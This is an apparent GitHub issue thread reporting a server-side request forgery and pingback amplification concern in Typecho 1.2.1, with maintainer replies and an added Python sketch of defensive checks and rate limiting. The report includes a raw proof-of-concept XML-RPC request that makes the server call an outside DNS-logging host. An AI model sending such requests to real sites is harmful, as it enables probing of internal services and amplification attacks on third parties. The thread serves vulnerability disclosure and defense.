
Typecho v1.2.1 SSRF vulnerability #1647

Open
Hebing123 opened this issue Nov 27, 2023 · 3 comments
Labels: security (This is a security issue)

Comments


Vulnerability report

Description
Attackers can pass malicious URLs as parameters to the pingback.ping method by constructing malicious requests. The first parameter in this method allows passing any URL, and the server will send the request with that URL as a parameter. Due to the lack of effective input verification and filtering mechanisms, attackers can exploit this vulnerability to initiate server-side requests, which may lead to security issues such as sensitive information leakage and server resource abuse.
Proof of Concept
POST /index.php/action/xmlrpc HTTP/1.1
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Host: 192.168.160.147
Connection: Keep-alive

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://npnjie.dnslog.cn/</string></value>
</param>
<param>
<value><string>http://192.168.160.147/index.php/archives/10/</string></value>
</param>
</params>
</methodCall>

Environment where the issue occurs

  • OS version: Ubuntu 20.04
  • Apache/NGINX version: Nginx 1.22.1
  • Database version: 5.7.34
  • PHP version: 7.4
  • Typecho version: 1.2.1
  • Browser version: Chrome/114.0.5735.289 Safari/537.36
@changyu233

The Pingback module was designed from the outset to confirm with other blog sites whether your post has been cited, and the SSRF issue you mention here appeared in an earlier version and has already been dealt with.
In the pingbackPing function in the /var/Widget/XmlRpc.php file, the destination host is already checked for safety with the Common::checkSafeHost() method, which blocks access to internal and reserved addresses and allows no protocols other than HTTP and HTTPS.
So I think it is inappropriate to say there is a vulnerability here.

@Hebing123
Author

Hebing123 commented Dec 8, 2023

Hello, this vulnerability may not exist as an SSRF vulnerability.

Based on your description, there may be attackers using the Pingback module to cause DoS or DDoS attacks on other sites.

This is the relevant literature. Its level of harm has constituted a security vulnerability; I'm not planning to apply for a CVE number for this vulnerability, but I hope you can fix it as soon as possible.

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/vulnerability/5759/wordpress-xmlrpc-pingback-ddos-vulnerability

Thanks for your reply.

@fenbox fenbox added the security This is a security issue label Jan 4, 2024
@joyqi
Member

joyqi commented Jan 26, 2024

I'm still looking for a simple and reliable way to prevent the pingback interface from being used for DDOS amplification attacks.
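The two concerns raised in this thread are the source-URL check that changyu233 describes (Common::checkSafeHost() restricting the pingback source to HTTP/HTTPS and non-internal hosts) and the amplification problem joyqi is still weighing (a caller supplying the same third-party source URL over and over so the blog keeps fetching it). The following is an added illustration, written here in Python rather than the project's PHP, and it is not Typecho's code: `is_safe_host` models the intent of a checkSafeHost-style check rather than its real implementation, and `SITE_HOST`, `FAKE_DNS`, `PingbackLimiter` and `handle_pingback` are assumptions made for the example. The XML-RPC body is a constructed request in the shape of the one quoted in the report, with placeholder hosts.

```python
import ipaddress
import xml.etree.ElementTree as ET
from collections import defaultdict, deque
from urllib.parse import urlparse

# Constructed sample body in the shape of the pingback.ping call quoted in the
# report; the hosts are placeholders, not the addresses from the issue.
SAMPLE_BODY = """<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://blog.example/post/1</string></value></param>
<param><value><string>http://my-site.example/index.php/archives/10/</string></value></param>
</params>
</methodCall>"""

# Assumed hostname of the blog that receives pingbacks: a pingback's target
# must point at one of our own posts, otherwise there is nothing to verify.
SITE_HOST = "my-site.example"

# Hypothetical resolver stub so the example runs offline: maps a hostname to
# the address it would resolve to (8.8.8.8 stands in for a public address).
FAKE_DNS = {"blog.example": "8.8.8.8", "intranet.example": "10.0.0.5"}


def parse_pingback(body):
    """Return (source_url, target_url) for a pingback.ping call, else None."""
    # A production handler should parse with defusedxml or equivalent so that
    # entity expansion cannot be turned against the parser itself.
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    if root.tag != "methodCall" or root.findtext("methodName") != "pingback.ping":
        return None
    params = [node.text for node in root.findall("./params/param/value/string")]
    if len(params) != 2 or not all(params):
        return None
    return params[0], params[1]


def is_safe_host(url, resolve=lambda host: FAKE_DNS.get(host)):
    """Model of a checkSafeHost-style check (assumption, not Typecho's code):
    only http(s), and the host must not be or resolve to a private, loopback,
    link-local, multicast or otherwise reserved address."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        addr = ipaddress.ip_address(parts.hostname)  # literal IP in the URL
    except ValueError:
        resolved = resolve(parts.hostname)  # hostname: check what it resolves to
        if resolved is None:
            return False
        addr = ipaddress.ip_address(resolved)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


class PingbackLimiter:
    """Sliding-window cap on verification fetches per source host, so one
    XML-RPC caller cannot turn the pingback endpoint into a request amplifier
    against a third party. Timestamps are passed in explicitly for testability."""

    def __init__(self, max_per_window, window_seconds):
        self.max_per_window = max_per_window
        self.window = window_seconds
        self.hits = defaultdict(deque)

    def allow(self, key, now):
        recent = self.hits[key]
        while recent and now - recent[0] >= self.window:
            recent.popleft()  # drop fetches that fell out of the window
        if len(recent) >= self.max_per_window:
            return False
        recent.append(now)
        return True


def handle_pingback(body, limiter, now):
    """Decide whether a pingback.ping request may trigger an outbound fetch."""
    parsed = parse_pingback(body)
    if parsed is None:
        return "rejected:not_pingback"
    source, target = parsed
    if urlparse(target).hostname != SITE_HOST:
        return "rejected:foreign_target"
    if not is_safe_host(source):
        return "rejected:unsafe_source"
    if not limiter.allow(urlparse(source).hostname, now):
        return "rejected:rate_limited"
    return "accepted"  # only now would the server fetch `source` to verify the link


if __name__ == "__main__":
    limiter = PingbackLimiter(max_per_window=3, window_seconds=60)
    for t in range(5):
        print(t, handle_pingback(SAMPLE_BODY, limiter, now=t))
```

The limiter is keyed on the host the server would fetch, which is the party an amplification attempt would hurt; a real deployment would also key a second limiter on the XML-RPC caller's address, and would cache verification results so a repeated (source, target) pair never causes a second fetch at all.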
